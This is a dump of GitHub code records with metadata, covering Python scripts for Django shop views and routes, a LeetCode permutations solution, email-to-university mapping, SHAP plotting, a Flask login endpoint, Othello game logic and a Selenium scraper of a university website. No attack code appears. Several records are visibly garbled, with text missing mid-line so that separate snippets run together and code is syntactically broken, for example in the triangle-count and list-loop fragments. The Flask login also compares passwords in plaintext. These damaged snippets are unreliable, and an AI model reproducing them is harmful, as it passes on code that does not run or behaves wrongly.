classifier_grid, X_test, y_test, 
y_classes, title=f\"k-Nearest Neighbors (k={k}) / testing set\", X1_lab='Age', X2_lab='Estimated Salary')\n\n\ndef demo(dataset=\"Social_Network_Ads\"):\n \"\"\"\n\n This function provides a demo of selected functions in this module.\n\n Required arguments:\n dataset: A string. Possible values: \"Social_Network_Ads\"\n\n \"\"\"\n if dataset == \"Social_Network_Ads\":\n _kNN_demo_Social_Network_Ads()\n else:\n raise TypeError(f\"dataset [{dataset}] is not defined\")\n","repo_name":"tombresee/wolvr","sub_path":"wolvr/kNN/_kNN.py","file_name":"_kNN.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29084440792","text":"#https://leetcode.com/problems/permutations/\n#%%\n#9:00 9:31\n\n# DFS Solution 43% 26%\nclass Solution:\n def dfs(self,nums):\n if len(nums) == 1:\n return [nums]\n out = []\n for i in range(len(nums)):\n num = nums[i]\n # perms = self.dfs(nums[i+1:])\n perms = self.dfs(nums[:i]+nums[i+1:])\n perms = [[num] + perm for perm in perms]\n out.extend(perms)\n return out\n\n def permute(self,nums):\n out = []\n if nums is None:\n return\n elif len(nums) == 0:\n return []\n return self.dfs(nums)\n \n\n\nnums = [1,2,3]\n# Output: [[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]]\nprint(Solution().permute(nums))\n# %%\n","repo_name":"Leoteles/leetcode-exercises","sub_path":"permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18292252206","text":"from django.urls import path\nfrom .views import *\n\napp_name=\"carro\"\n\nurlpatterns = [ \n\n path(\"agregar//\", agregar_producto, name=\"agregar\"),\n path(\"eliminar//\", eliminar_producto, name=\"eliminar\"),\n path(\"restar//\", restar_producto, name=\"restar\"),\n path(\"limpiar/\", limpiar_carro, name=\"limpiar\"),\n\n]","repo_name":"Juiceb0x21/PetShopAavances","sub_path":"carro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"32956644643","text":"import re\nimport pandas as pd\nimport os\nimport sys\nimport json\nimport numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', type=str, dest='path', default='data/papers/', help='specifies the path to input dir')\n\nrootdir = parser.parse_args().path\n\n######################FUNCTIONS\n\ndef get_school_from_mail(mail, mapping):\n \"\"\"maps email to institution\"\"\"\n if mail in mapping:\n return (mapping[mail], mail)\n elif re.findall('[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*$', mail)[0] in mapping:\n double = re.findall('[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*$', mail)[0]\n return (mapping[double], double)\n else:\n triplet = re.findall('[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*\\.[a-zA-Z0-9\\-]*$', mail)\n if len(triplet) > 0 and triplet[0] in mapping:\n return (mapping[triplet[0]], triplet[0])\n else:\n return (np.nan, mail)\n\ndef get_org_name(x):\n candidates = x.split('.')\n for c in candidates:\n if c in ['qq','sina','163']:\n return c\n lengths = np.array([len(z) for z in candidates])\n return candidates[lengths.argmax()]\n\n#############################\ncontents = []\ni = 0\nsource = []\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n if 'txt' in file:\n i += 1\n path = os.path.join(subdir, file)\n with open(path) as file:\n try:\n text = file.read()\n 
contents.append(text)\n source.append(path[len(rootdir):-4])\n except:\n name, message, content = sys.exc_info()\n print(message)\n\nschools = open('data/world_universities_and_domains.json').read()\nparsed_json = json.loads(schools)\n\n\nmapping = {}\ncountry_uni = {}\nfor j in parsed_json:\n mapping[j['domains'][0]] = j['name']\n country_uni[j['domains'][0]] = j['country']\n if len(j['domains']) > 1:\n mapping[j['domains'][1]] = j['name']\n country_uni[j['domains'][1]] = j['country']\n if len(j['domains']) > 2:\n mapping[j['domains'][2]] = j['name']\n country_uni[j['domains'][2]] = j['country']\n\n\nmapping['nie.edu.sg'] = \"National Institute of Education (NIE), Singapore\"\nmapping['rub.de'] = \"Ruhr-University Bochum\"\nmapping['uni-due.de'] = \"Universität Duisburg-Essen\"\nmapping['collide.info'] = \"Universität Duisburg-Essen\"\nmapping['dawsoncollege.qc.ca'] = \"Dawson College\"\nmapping['dawsoncollege.ca'] = \"Dawson College\"\nmapping['johnabbott.qc.ca'] = \"John Abbott College\"\nmapping['johnabbott.ca'] = \"John Abbott College\"\nmapping['vaniercollege.qc.ca'] = 'Vanier Colleege'\n\ninstitution = []\nfor text in contents:\n mails_in_paper = re.findall('[a-zA-Z0-9\\.\\-]*@[a-zA-Z0-9\\.\\-]*\\.[a-zA-Z0-9\\.\\-]*(?!\\S*\\:\\S*)', text)\n institution.append([(get_school_from_mail(m.split('@')[1].lower(), mapping), m, i) for i, m in enumerate(mails_in_paper)])\n\ninst = pd.DataFrame([(i[0][0],i[0][1], i[1],i[2], source[index]) for index, uni in enumerate(institution) for i in uni ],\n columns=['name', 'domain', 'mail','authorindex','file'])\ninst.loc[inst['name'].isna(),'name'] = inst[inst['name'].isna()].domain.map(lambda x: get_org_name(x))\ninst['country'] = inst.domain.map(country_uni)\n\ncountries = open('data/country-by-domain-tld.json').read()\nparsed_countries = json.loads(countries)\nparsed_countries = { parsed['tld']: parsed['country'] for parsed in parsed_countries}\n\nparsed_countries['.uk']= \"United Kingdom\"\nparsed_countries['.us'] = \"United States\"\n\ninst.loc[inst.country.isna(), 'country'] = inst[inst.country.isna()].domain.map(lambda x: re.findall(\"(\\.[a-zA-Z0-9]*$)\",x)[0]).map(parsed_countries)\ninst.loc[(inst.country.isna()) & (inst.name.isin(['qq','sina','163'])), 'country'] = 'China'\n\n\nprint('[Info] Saved universities data to ../data/Universities.csv')\ninst.to_csv('data/Universities.csv')\n","repo_name":"nourabassi/semester-project","sub_path":"Scripts/universities_extraction.py","file_name":"universities_extraction.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74024965049","text":"import matplotlib.pyplot as plt\r\nfrom utils import *\r\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\r\n AutoMinorLocator)\r\n\r\n#all of the tools to be compared, including scoring methods and model types (tuscan, chop-chop)\r\ntools = ['ssc' ,'tuscan-classification', 'wu-crispr', 'sgrnascorer2'] #'tuscan-regression'] #,'sgrnascorer2','wu-crispr','chop-chop-xu','chop-chop-doench','chop-chop-moreno']\r\n\r\n#the datasets these tools were ran on\r\ndatasets = ['xu']#,'doench']\r\n\r\n#setting up for plotting\r\npositions = range(0,20)\r\nx = np.arange(len(positions)) # the label locations\r\nwidth = 1 # the width of the bars together\r\nbarwidth = width / (len(tools)*len(datasets)) #the width of a single bar\r\nfig, ax = plt.subplots(figsize=(10,7))\r\nspacer = 0\r\n\r\n#add separators for each position in the guide\r\nfor p in 
range(0,21):\r\n    plt.axvline(x=p, color=\"black\",linewidth=0.2)\r\n\r\ntool_positions = [] #where the tool name is to be placed\r\ntool_labels = [] #what the tool name is\r\n\r\n#plotting data method by method\r\ncnt = 0\r\nfor tool in tools:\r\n    for data in datasets:\r\n\r\n        #load data from pickle\r\n        pickleFileName = \"SHAP-\" + tool + \"-\" + data\r\n        #get a list of tuples (avg shap val, feature name)\r\n        featureImp = getAvgShapValues(pickleFileName)\r\n        #creates dictionary where average[nucleotide id][position] = the average shap value of the nucleotide being at that position\r\n        averages = getShapValsForPosFeatures(featureImp) #function def in utils\r\n\r\n        #plot the values of each nucleotide at x_coord\r\n        x_coord = x + spacer + barwidth/2 + barwidth*cnt\r\n        pA = ax.bar(x_coord, averages[0], barwidth, color=\"#1f77b4\")\r\n        pC = ax.bar(x_coord, averages[1], barwidth, color=\"#ff7f0e\")\r\n        pG = ax.bar(x_coord, averages[2], barwidth, color=\"#2ca02c\")\r\n        pT = ax.bar(x_coord, averages[3], barwidth, color=\"#d62728\")\r\n\r\n        #add the name of the tool under each bar [will use the two arrays for this later]\r\n        for xp in x_coord:\r\n            tool_positions.append(xp)\r\n            tool_labels.append( getShorthand(tool) )\r\n\r\n        cnt = cnt+1\r\n\r\n#plot names of tools at the bottom\r\nplt.xticks(tool_positions, tool_labels, rotation='vertical')\r\n\r\n#plot the number of the guide position at the top\r\nax_t = ax.secondary_xaxis('top')\r\nax_t.tick_params(axis='x', direction='out', width=0, length=0, color=\"#D3D3D3\")\r\nax_t.set_xticks([p + 0.5 for p in positions])\r\nax_t.set_xticklabels(positions)\r\n\r\n#plot a line at 0\r\nplt.plot(range(-1,21), [0]*22, color='black', linewidth=0.2)\r\n\r\n\r\nplt.ylabel(\"SHAP values\")\r\nplt.xlabel(\"Models ran on Xu 2015\")\r\nplt.title(\"Guide positions\")\r\nplt.legend((pA[0], pC[0], pG[0], pT[0]), ('A', 'C', 'G', 'T'))\r\nplt.savefig('compare.png',bbox_inches=\"tight\")\r\n\r\nplt.show()\r\n","repo_name":"avaspataru/SHAP-Value-Plotting-for-CRISPR-tools","sub_path":"src/comparePositionTools.py","file_name":"comparePositionTools.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"7728673250","text":"\"\"\"Application blueprint\"\"\"\n\nimport secrets\n\nfrom flask import Blueprint, abort, request, jsonify, Response\n\nfrom vitamin_d_resource_auth.models import User, Administrator, Session\n\n\nblueprint = Blueprint('application', __name__)\n\n@blueprint.route('/auth', methods=['POST'])\ndef post_auth():\n    \"\"\"Post auth, check authentication\"\"\"\n    user = User.objects(session__code=request.json['session_code']).first()\n    if user:\n        return jsonify({'username': user.username})\n    admin = Administrator.objects(session__code=request.json['session_code']).first()\n    if admin:\n        return jsonify({'username': admin.username})\n    return abort(401)\n\n\n@blueprint.route('/login', methods=['POST'])\ndef post_login():\n    \"\"\"Post login\"\"\"\n    username = request.json['username']\n    user = User.objects(username=username).first()\n    if user and user.password == request.json['password']:\n        session_code = secrets.token_urlsafe()\n        user.session = Session(code=session_code)\n        user.save()\n        return jsonify({'session_code': session_code})\n    return abort(401)\n\n\n@blueprint.errorhandler(404)\ndef page_not_found(error):\n    \"\"\"Handle 404 errors\"\"\"\n    print(error)\n    return 
'Not Found', 404\n","repo_name":"joostsijm/vitamin_d_core-backend","sub_path":"vitamin_d_resource_auth/src/vitamin_d_resource_auth/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"24367816204","text":"\nimport const\nEIGHT_DIRECTION = [[-1, -1], [-1, 1], [1, 1],\n                   [1, -1], [1, 0], [0, 1], [-1, 0], [0, -1]]\n\n\nclass Player:\n    def __init__(self, color, board):\n        self.color = color  # color of player\n        self.board = board  # board\n\n    def empty_squares(self):\n        \"\"\"\n        find empty squares\n        :return: squares where tiles can still be placed\n        \"\"\"\n        positions = [(i+1, j+1)\n                     for i in range(self.board.num_of_square)\n                     for j in range(self.board.num_of_square)]\n        positions = filter(\n            lambda x: x not in self.board.tiles.keys(), positions)\n        return list(positions)\n\n    def has_legal(self):\n        \"\"\"\n        judge if the current player can still make legal moves\n        :return: boolean, True if still have legal moves\n        \"\"\"\n        positions = self.empty_squares()\n        for pos in positions:\n            increment = len(self.calc_flip(\n                pos))\n            if increment > 0:\n                return True\n        return False\n\n    def calc_flip(self, pos):\n        \"\"\"\n        calculate the flip scenario without actually flipping the tiles\n        :param pos: intended position for the new tile\n        :return: list of to-be-flipped positions\n        \"\"\"\n        flip_pos_all = []\n        for direction in EIGHT_DIRECTION:\n            curr_pos = pos\n            flip_pos_one = []\n            while True:\n                curr_pos = (curr_pos[0]+direction[0],\n                            curr_pos[1]+direction[1])\n                if curr_pos not in self.board.tiles.keys():\n                    break\n                curr_tile = self.board.tiles[curr_pos]\n                if curr_tile.color == self.color:\n                    flip_pos_all += flip_pos_one\n                    break\n                flip_pos_one.append(curr_tile.tile_pos)\n        return flip_pos_all\n\n    def flip(self, positions):\n        \"\"\"\n        flip the tiles on board and update tile color count\n        :param positions: list of to-be-flipped positions\n        :return:\n        \"\"\"\n        for pos in positions:\n            self.board.tiles[pos].color = self.color\n            if self.color == const.BLACK:\n                self.board.wnum -= 1\n                self.board.bnum += 1\n            else:\n                self.board.wnum += 1\n                self.board.bnum -= 1\n\n    def drop_tile(self, tile_pos, flip_pos):\n        \"\"\"\n        add tile to board and flip tiles\n        :param tile_pos: intended position for the new tile\n        :param flip_pos: list of to-be-flipped positions\n        :return:\n        \"\"\"\n        self.board.add_tile(self.color, tile_pos)\n        self.flip(flip_pos)\n","repo_name":"joyahuang/Games","sub_path":"Othello/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"7573694280","text":"\"\"\"\nDjango settings for BloodFinder project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nfrom settings import *\nimport settings\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDEBUG = True\nACCOUNT_DEFAULT_HTTP_PROTOCOL = 'http'\n\n# INSTALLED_APPS = settings.INSTALLED_APPS + (\n#     # ...\n#     # 'django.contrib.staticfiles',\n#     # ...\n#     'debug_toolbar',\n# )\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.sqlite3',\n        'NAME': os.path.join(BASE_DIR, 'db2.sqlite3'),\n    }\n}\n#\n# DATABASES = {\n#     'default': {\n#         'ENGINE': 
'django.db.backends.postgresql_psycopg2',\n#         'NAME': 'enhanced_cwe2',\n#         'USER': 'django',\n#         'PASSWORD': 'django',\n#         'HOST': 'localhost',\n#     }\n# }","repo_name":"CaveSentinels/ReportWriter","sub_path":"ReportWriter/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"36806473043","text":"a=['sukanya','rani','subhshree']\ni=0\nwhile i int:\n        nums.sort()\n        count=0\n        for right in range(2,len(nums)):\n            left=0\n            curr=right-1\n            while left < curr:\n                if nums[left]+nums[curr]>nums[right]:\n                    count+=curr-left\n                    curr-=1\n                else:\n                    left+=1\n        return count\n\n\n\n\n\n\n\n\n\n# from typing import List\n# class Solution:\n#     def triangleNumber(self, nums: List[int]) -> int:\n#         nums.sort()\n#         mm=[]\n        # for i in range(len(nums)):\n        #     left=i+1\n        #     right=len(nums)-1\n        #     while leftnums[right] and 2*(nums[i]+nums[left])>nums[right]:\n        #             mm.append([nums[i],nums[left],nums[right]])\n        #             if nums[left]==nums[left+1]:\n        #                 left+=1\n        #             elif nums[right]==nums[right-1]:\n        #                 right-=1\n        #             else:\n        #                 left+=1\n        #                 right-=1\n        #         elif nums[i]+nums[left]nums[right]:\n        #             left+=1\n        #         elif nums[i]+nums[left] list[dict]:\n    promo_str = get_promo_str(check_upcoming_promos)\n    meta_data = element[\"promotions\"][promo_str][0][\"promotionalOffers\"]\n\n    return meta_data\n\n\ndef trim_date(date_str: str) -> str:\n    return f\"{extract_day(date_str)} @ {extract_hour(date_str)}h\"\n\n\ndef extract_hour(date_str: str) -> str:\n    return date_str[11:13]\n\n\ndef extract_day(date_str: str) -> str:\n    return date_str[:10]\n\n\ndef to_discount_value(price_multiplier_in_percent: int) -> int:\n    discount_value = 100 - price_multiplier_in_percent\n    return discount_value\n\n\ndef to_discount_symbol(discount_type: str) -> str:\n    discount_symbol = \"%\" if discount_type == \"PERCENTAGE\" else \"???\"\n    return discount_symbol\n\n\ndef print_promos(\n    filtered_promos: list[dict],\n    check_upcoming_promos: bool = True,\n) -> bool:\n    for e in get_sorted_promos(filtered_promos, check_upcoming_promos):\n        name = e[\"title\"]\n        meta_data = get_meta_data(e, check_upcoming_promos)\n\n        for promotional_offer in meta_data:\n            start_date = trim_date(promotional_offer[\"startDate\"])\n            end_date = trim_date(promotional_offer[\"endDate\"])\n            discount = to_discount_value(\n                promotional_offer[\"discountSetting\"][\"discountPercentage\"],\n            )\n            symbol = to_discount_symbol(\n                promotional_offer[\"discountSetting\"][\"discountType\"],\n            )\n\n            print(\n                f\"- [ {discount:3d}{symbol} off ] {start_date} -> {end_date} : {name}\",\n            )\n\n    return True\n","repo_name":"woctezuma/egs-15DaysofGames","sub_path":"src/print_utils.py","file_name":"print_utils.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"}
{"seq_id":"38878507475","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nimport time as t\n\n# number as per the dropdown in the site\ndistrict = {\n\t'All' \t\t\t\t\t: 0 ,\n\t'THIRUVANANTHAPURAM'\t: 1 ,\n\t'KOLLAM' \t\t\t\t: 2 ,\n\t'PATHANAMTHITTA' \t\t: 3 ,\n\t'ALAPPUZHA' \t\t\t: 4 ,\n\t'KOTTAYAM' \t\t\t\t: 5 ,\n\t'IDUKKI' \t\t\t\t: 6 ,\n\t'ERNAKULAM' \t\t\t: 7 ,\n\t'THRISSUR' \t\t\t\t: 8 ,\n\t'PALAKKAD' \t\t\t\t: 9 ,\n\t'MALAPPURAM' \t\t\t: 10 ,\n\t'KOZHIKODE' \t\t\t: 11 ,\n\t'WAYANAD' \t\t\t\t: 12 ,\n\t'KANNUR' \t\t\t\t: 13 ,\n\t'KASARAGOD' \t\t\t: 14 ,\n\t'Other' 
\t\t\t\t: 15 ,\n}\n\nyear = {\n\t2021: 0,\n\t2020: 1,\n\t2019: 2,\n\t2018: 3,\n\t2017: 4,\n\t2016: 5,\n\t2015: 6\n}\n\ndegree = {\n\t'UG' : 1,\n\t'PG' : 2,\n}\n\nprogram = {\n\t'All' \t\t\t: 0 ,\n\t'B.Tech' \t\t: 1 ,\n\t'B.Arch' \t\t: 2 ,\n\t'Hotel' \t\t: 3 ,\n\t'Management' \t: 4 ,\n\t'and' \t\t\t: 5 ,\n\t'Catering' \t\t: 6 ,\n\t'Technology' \t: 7 ,\n\t'B.Des' \t\t: 8 ,\n}\n\n\n# to select the item in the dropdown (in site)\ndef select_combobox_x(driver,dropdown_val):\n\tdriver[0].click()\n\tdriver[0].send_keys(Keys.ARROW_DOWN*dropdown_val)\n\tdriver[0].send_keys(Keys.RETURN)\n\t# t.sleep(5)\n\n\n# to print year, district, degree and program in dict format\ndef checklist(driver):\n\tif type(driver) == list:\n\t\tprint(\"{\")\n\t\tfor i,j in enumerate(driver[0].text.split()):\n\t\t\tprint(\"\\t\\'\",j,'\\':',i,\",\")\n\t\tprint(\"}\")\n\n\ndef automated_choose(driver):\t\n\t#1\n\tselect_yr = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[1]/span[1]/select\")\n\tprint(' - select complete')\n\tchecklist(select_yr)\n\tselect_combobox_x(select_yr, year[2015])\n\n\t#2\n\tselect_dis = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[1]/span[2]/select\")\n\tprint(' - select complete')\n\tchecklist(select_dis)\n\tselect_combobox_x(select_dis, district['ERNAKULAM'])\n\n\t#3\n\tselect_deg = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[2]/span[1]/select\")\n\tprint(' - select complete')\n\tchecklist(select_deg)\n\tselect_combobox_x(select_deg, degree['UG'])\n\n\t#4\n\tselect_prog = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[2]/span[2]/select\")\n\tprint(' - select complete')\n\tchecklist(select_prog)\n\tselect_combobox_x(select_prog, program['B.Tech'])\n\n\n# to iterate the selenium_scraped_element \ndef checklist_x(driver):\n\tif type(driver) == list:\n\t\tfor i in driver:\n\t\t\tif type(i) != list:\n\t\t\t\tprint(i.text.split('\\n'))\n\t\t\tprint()\n\t\t\t\n# to get affiliated links for further scrapping\ndef get_affiliated_links(driver):\n\t# 1\n\tselect_yr = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/form/div/div[1]/span[1]/select\")\n\tprint(' - select complete')\n\tchecklist(select_yr)\n\tselect_combobox_x(select_yr, year[2020])\n\n\ta = driver.find_elements(By.XPATH,\"/html/body/div[3]/div[1]/div[2]/div/table/tbody/tr/td[1]/span/a\")\n\tprint(' - select complete')\n\taffiliated_links =[]\n\tif type(a) == list:\n\t\tfor i in a:\n\t\t\taffiliated_links.append(i.get_attribute(\"href\"))\n\n\twith open('affiliated_links.py','w') as f:\n\t\tf.write(\"affiliated_links=['\")\n\t\tf.write(\"',\\n'\".join(affiliated_links))\n\t\tf.write(\"']\")\n\n\n# main\ndef ktu_scrapper():\n\tdriver = webdriver.Edge(\"msedgedriver.exe\")\n\tdriver.get('https://ktu.edu.in/eu/afn/affiliationInstitutes.htm')\n\t\n\t# automated_choose(driver)\n\n\tget_affiliated_links(driver)\t\n\n\t# from affiliated_links import affiliated_links\n\t# print(affiliated_links)\n\t\n\tdriver.implicitly_wait(5)\n\n\tdriver.close()\n\nktu_scrapper()\n","repo_name":"amankshihab/keam-project-web-app","sub_path":"scrapping_functions/ktu_scrapper.py","file_name":"ktu_scrapper.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29312673849","text":"import random\n\ndef adivina_mi_numero():\n numero_secreto = random.randint(1, 20)\n intentos = 5\n\n print(\"¡Bienvenido al juego 
Adivina mi número!\")\n print(\"Tienes 5 intentos para adivinar el número secreto (entre 1 y 20). ¡Buena suerte!\")\n\n while intentos > 0:\n print(\"\\nIntento\", 6 - intentos)\n numero = int(input(\"Ingresa un número: \"))\n\n if numero == numero_secreto:\n print(\"¡Adivinaste, mi número era\", numero_secreto, \"!\")\n return\n\n if numero < numero_secreto:\n print(\"Mi número es mayor.\")\n else:\n print(\"Mi número es menor.\")\n\n intentos -= 1\n\n print(\"No adivinaste, ¡mi número era\", numero_secreto, \"!\")\n\nadivina_mi_numero()\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej12/hito1_ej12_f2f14c7d9264c2a1470f6fc36dad8973.py","file_name":"hito1_ej12_f2f14c7d9264c2a1470f6fc36dad8973.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74681749049","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom .models import Product\nfrom .forms import ProductForm, RawProductForm\n# Create your views here.\n\n# def product_detail_view(request):\n# obj = Product.objects.get(id=1)\n# print(\"printing obj\")\n# print(obj.description)\n# # context={\n# # 'title':obj.title,\n# # 'description':obj.description\n# # }\n# context = {\n# 'object':obj\n# }\n# return render(request,'product/product_detail.html',context)\n\ndef product_detail_view(request,id):\n #obj = Product.objects.get(id=my_id)\n obj = get_object_or_404(Product,id=id)\n print(\"printing obj\")\n print(obj.description)\n\n context = {\n 'object':obj\n }\n return render(request,'product/product_detail.html',context)\n\n\n\n\ndef product_create_view(request):\n my_form = RawProductForm()\n if request.method == 'POST':\n my_form = RawProductForm(request.POST)\n if my_form.is_valid():\n print(my_form.cleaned_data)\n Product.objects.create(**my_form.cleaned_data)\n #print(my_form.save())\n #my_form.save()\n else:\n print(my_form.errors)\n\n context = {\n 'form':my_form\n }\n return render(request,'product/product_create.html',context)\n\n\ndef product_update_view(request,id): #rendering with initial data\n initial_data = {\n 'title':\"My this awsome title\"\n }\n obj = Product.objects.get(id=id)\n form = ProductForm(request.POST,None,obj)\n if form.is_valid():\n print(form.cleaned_data)\n form.save()\n else:\n print(form.errors)\n\n context = {\n 'form':form\n }\n return render(request,'product/product_update.html',context)\n \n\n\n\n\n\n# def product_create_view(request):\n# form = ProductForm(request.POST or None)\n# #print(form)\n# if form.is_valid():\n# print(\"print save\")\n# print(form.save())\n# form.save()\n \n# context = {\n# 'form':form\n# }\n# return render(request,'product/product_create.html',context)\n\n\ndef product_delete_view(request,my_id):\n #obj = Product.objects.get(id=my_id)\n obj = get_object_or_404(Product,id=my_id)\n print(\"printing obj\")\n print(obj.description)\n if request.method == 'POST': \n obj.delete()\n return redirect('../../')\n\n context = {\n 'object':obj\n }\n return render(request,'product/product_delete.html',context)\n\ndef product_list_view(request):\n query_set = Product.objects.all()\n print(\"printing obj\")\n print(query_set)\n\n for a in query_set:\n print(a.get_absolute_url)\n\n context = {\n 'object_list':query_set\n }\n return 
 render(request,'product/product_list.html',context)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"daveotengo/djapp","sub_path":"src/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72313293050","text":"from Stack import Stack\r\n\r\n\r\ndef sort_expression(expression):\r\n\tnum = \"\"\r\n\tsort_list = []\r\n\texpression =expression.replace(\" \", \"\")\r\n\tfor i in expression:\r\n\t\tif (i == \".\" or i.isdigit()):\r\n\t\t\tnum += i\r\n\t\telse:\r\n\t\t\tif len(num) != 0:\r\n\t\t\t\tsort_list.append(float(num))\r\n\t\t\tnum = \"\"\r\n\t\t\tsort_list.append(i)\r\n\r\n\tsort_list.append(float(num))\r\n\treturn sort_list\r\n\r\n\r\ndef eval_exp(expression):\r\n\tdef run(top = 10):\r\n\t\twhile number_stack.size() > 1 and getPriority(operator_stack.top()) <= top:\r\n\t\t\ty = number_stack.pop()\r\n\t\t\tx = number_stack.pop()\r\n\t\t\t\t\t\r\n\t\t\tf = getFunc(operator_stack.pop())\r\n\t\t\tnumber_stack.push(f(x,y))\r\n\r\n\toperator_stack = Stack()\r\n\tnumber_stack = Stack()\r\n\toperator = {\r\n\t\t \"^\" : (1, lambda x,y : x**y),\r\n\t\t \"*\" : (2, lambda x,y : x*y),\r\n\t\t \"/\" : (2, lambda x,y : x/y),\r\n\t\t \"+\" : (3, lambda x,y : x+y),\r\n\t\t \"-\" : (3, lambda x,y : x-y),\r\n\t\t \"=\" : (4,lambda x, y : x==y),\r\n\t\t \"<\" : (4,lambda x, y : x<y),\r\n\t\t \">\" : (4,lambda x, y : x>y),\r\n\t\t}\r\n\r\n\tgetPriority = lambda sym: operator[sym][0]\r\n\tgetFunc = lambda sym: operator[sym][1]\r\n\r\n\texpr_list = sort_expression(expression)\r\n\t\r\n\r\n\t\r\n\tfor token in range(len(expr_list)):\r\n\t\t#If number\r\n\t\tif (token %2 == 0):\r\n\t\t\tnumber_stack.push(expr_list[token])\r\n\t\t\t\r\n\r\n\t\t#If operator\r\n\t\telse:\r\n\t\t\tif (operator_stack.isEmpty() or (getPriority(operator_stack.top()) > getPriority(expr_list[token])) ):\r\n\t\t\t\toperator_stack.push(expr_list[token])\r\n\t\t\telse:\r\n\t\t\t\trun(getPriority(expr_list[token]))\r\n\t\t\t\toperator_stack.push(expr_list[token])\r\n\t\r\n\trun()\r\n\t\r\n\treturn number_stack.pop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tprint(\"Arithmetic test:\")\r\n\tprint(eval_exp(\"2+4+2\"))\r\n\tprint(eval_exp(\"7*3/4/5\"))\r\n\tprint(eval_exp(\"1+2/3+4\"))\r\n\tprint(eval_exp(\"1-4/ 2 / 9\"))\r\n\tprint(eval_exp(\"1.01^10\"))\r\n\r\n\tprint(\"\\nComparison test:\")\r\n\tprint(eval_exp(\"10-1 = 19\"))\r\n\tprint(eval_exp(\"12/2 < 32/4\"))\r\n\tprint(eval_exp(\"0.99^10 > 2\"))","repo_name":"ZaidMinhas/COMP-352_Topics","sub_path":"Stacks/Evaluating Arithmetic Expressions.py","file_name":"Evaluating Arithmetic Expressions.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1407625170","text":"# import cv2\n\n# #print(\"Before URL\")\n# # cap = cv2.VideoCapture('http://192.168.100.12:8080/jsfs.html')\n# cap = cv2.VideoCapture('https://www.youtube.com/watch?v=2H1Gho3LOUE')\n# #print(\"After URL\")\n\n# while True:\n\n#     #print('About to start the Read command')\n#     ret, frame = cap.read()\n#     #print('About to show frame of Video.')\n#     cv2.imshow(\"Capturing\",frame)\n#     #print('Running..')\n\n#     if cv2.waitKey(1) & 0xFF == ord('q'):\n#         break\n\n# cap.release()\n# cv2.destroyAllWindows()\n\n\n# import cv2\n# import urllib.request as ur\n# import numpy as np\n\n# stream = ur.urlopen('http://192.168.100.12:8080/browserfs.html')\n# bytes = ''\n# while True:\n#     bytes += stream.read(1024)\n#     a = 
